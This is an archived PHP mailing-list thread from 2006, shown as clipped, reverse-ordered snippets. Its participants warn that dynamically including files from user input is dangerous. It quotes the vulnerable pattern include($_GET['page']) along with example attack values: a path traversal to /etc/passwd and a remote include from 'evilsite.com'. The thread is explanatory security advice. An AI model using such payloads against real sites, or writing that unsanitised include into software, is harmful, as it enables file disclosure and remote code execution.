No.
He's saying YOUR code is, more or less, not unlike:
Maybe it's more like this:
Well, if at some point, you forget to initialize $page, AND IF you
have register_globals on, for some reason, perhaps even because you
later install some 3rd-party software that needs it, and you integrate
t
On Tue, June 13, 2006 9:17 pm, Dave M G wrote:
> Richard Lynch wrote:
>> The problem with making it dynamic, is that you've just made it
>> AWFULLY easy for some Bad Guy to inject their own PHP file into your
>> system...
>>
>> Think about that for awhile.
> I have thought about it, and I can only
On Wednesday 14 June 2006 21:48, Dave M G wrote:
> Jochem,
>
> > ::index.php
> >
> > > include $_GET['page'];
> > ?>
>
> Wouldn't strip_tags() eliminate the tags that make this possible?
No, because that's not what the hole is. YOUR CODE is include $_GET['page'].
That's an easily exploitable
Jochem,
::index.php
Wouldn't strip_tags() eliminate the tags that make this possible?
--
Dave M G
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
Dave M G wrote:
> Larry,
>
> Thank you for responding.
>>
>> $untrusted_var = '../../../../../../../etc/passwd';
>> include($untrusted_var);
>>
>> Or in later versions of PHP, I *think* the following may even work:
>>
>> $untrusted_var = 'http://evilsite.com/pub/evil.php';
>> include($untrusted_va
Larry,
Thank you for responding.
$untrusted_var = '../../../../../../../etc/passwd';
include($untrusted_var);
Or in later versions of PHP, I *think* the following may even work:
$untrusted_var = 'http://evilsite.com/pub/evil.php';
include($untrusted_var);
I'm still not sure I see the danger
On Tuesday 13 June 2006 21:17, Dave M G wrote:
> If there is some other way for them to exploit a dynamic include()
> function, then please let me know.
$untrusted_var = '../../../../../../../etc/passwd';
include($untrusted_var);
Or in later versions of PHP, I *think* the following may even work
Richard Lynch wrote:
The problem with making it dynamic, is that you've just made it
AWFULLY easy for some Bad Guy to inject their own PHP file into your
system...
Think about that for awhile.
I have thought about it, and I can only see it as possible if the person
already has the ability to wr
The problem with making it dynamic, is that you've just made it
AWFULLY easy for some Bad Guy to inject their own PHP file into your
system...
Think about that for awhile.
On Tue, June 13, 2006 5:22 am, Dave M G wrote:
> PHP List,
>
> Up until now, in order to get all the functions and classes
Anyway when you include files by script (not scpecifying the order in
which u include them) check out class inheritage and class usage in
files you include. Classes that are inherited must be included first.
Andy
At 7:22 PM +0900 6/13/06, Dave M G wrote:
PHP List,
Up until now, i
At 7:22 PM +0900 6/13/06, Dave M G wrote:
>PHP List,
>
>Up until now, in order to get all the functions and classes I need in my
>scripts, I have always made a file called "includes.php" that contains a
>series of include() statements for all of the files that I want to include.
>Then I just inc
PHP List,
Up until now, in order to get all the functions and classes I need in my
scripts, I have always made a file called "includes.php" that contains a
series of include() statements for all of the files that I want to
include. Then I just include that one file at the top of all my PHP scr
12 matches
Mail list logo
